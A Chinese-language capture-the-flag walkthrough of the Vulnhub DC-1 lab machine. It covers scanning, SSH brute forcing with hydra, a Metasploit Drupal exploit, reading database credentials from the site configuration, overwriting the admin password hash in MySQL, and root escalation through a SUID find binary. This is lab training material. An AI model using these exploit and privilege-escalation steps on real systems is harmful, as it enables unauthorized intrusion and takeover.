Vulnhub靶场 DC-1

靶机地址
https://www.vulnhub.com/entry/dc-1-1,292/
导入到VMware里面先编辑虚拟机设置,选择NAT模式

然后具体的扫描一下ip地址
可以看到一些开放的端口

尝试爆破一下ssh的密码
cewl爬取网站的信息,生成字典
hydra进行爆破
但是没有有效的结果

访问一下网站, 可以发现是Drupal CMS

打开msfconsole 搜索看看有无相关的漏洞利用

search drupal

show options 查看模块需要配置的参数
需要配置一下rhosts

set rhosts 192.168.75.133
然后 run 运行
进入到shell里面

flag1

ls可以看到一个flag1.txt

给了一个提示, 需要找配置文件

搜一下说是在sites目录下的字目录default 中

flag2

在配置文件里面找到了flag2 以及 mysql数据库的用户名和密码
(需要提取或者爆破)

运行一个shell
然后再使用一个python的交互式
python3 -c 'import pty;pty.spawn("/bin/bash")'方便看
用find命令找到一个flag4

flag4

这告诉我们需要提权, 查看后面flag

先继续之前的mysql

mysql -u dbuser -pR0ck3t进入到mysql里面

show databases;
use drupaldb;

show tables;

查看一下表, 发现admin信息
admin的密码是经过加密的, 无法得知
文章: https://drupalchina.cn/node/2128

需要修改admin的密码, 找到password-hash.sh文件
php scripts/password-hash.sh admin修改密码
进入到数据库里面, 替换密码为 得到的密码
$S$D.s8wCozzq8y7h0NtDSfasvAE/Soq5Ieig.0MoiMBKekYSocvVLm

update users set pass="$S$D.s8wCozzq8y7h0NtDSfasvAE/Soq5Ieig.0MoiMBKekYSocvVLm" where name="admin";

然后就是登录网站了
admin / admin成功登录

flag3

找到flag3

提示了一个find的命令

find / -user root -perm -4000 -print 2>/dev/null
可以找到find具有suid权限

find /etc/passwd -exec whoami \;
可以发现是root权限

find / -name 666 -exec "/bin/sh" \;
接下来就是root的权限执行命令了

finalflag

找到最后的flag